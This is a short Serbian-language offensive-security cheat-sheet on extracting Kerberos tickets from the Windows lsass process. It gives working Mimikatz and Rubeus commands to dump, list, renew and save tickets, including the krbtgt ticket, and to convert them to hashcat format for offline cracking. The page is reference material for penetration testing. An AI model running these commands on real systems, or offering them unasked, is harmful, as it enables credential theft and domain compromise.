Harvesting tickets from Windows

Reading time: 2 minutes

Karate u Windows-u upravlja i čuva proces lsass (Local Security Authority Subsystem Service), koji je odgovoran za upravljanje bezbednosnim politikama. Da bi se izvukli ovi karte, potrebno je interagovati sa lsass procesom. Korisnik koji nije administrator može pristupiti samo svojim kartama, dok administrator ima privilegiju da izvuče sve karte na sistemu. Za takve operacije, alati Mimikatz i Rubeus se široko koriste, svaki nudeći različite komande i funkcionalnosti.

Mimikatz

Mimikatz je svestran alat koji može interagovati sa bezbednošću Windows-a. Koristi se ne samo za vađenje karata, već i za razne druge operacije vezane za bezbednost.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus je alat posebno prilagođen za interakciju i manipulaciju Kerberos-om. Koristi se za ekstrakciju i rukovanje tiketima, kao i za druge aktivnosti povezane sa Kerberos-om.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Kada koristite ove komande, obavezno zamenite mesta kao što su <BASE64_TICKET> i <luid> sa stvarnim Base64 kodiranim tiketom i Logon ID-om. Ovi alati pružaju opsežnu funkcionalnost za upravljanje tiketima i interakciju sa bezbednosnim mehanizmima Windows-a.

References

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/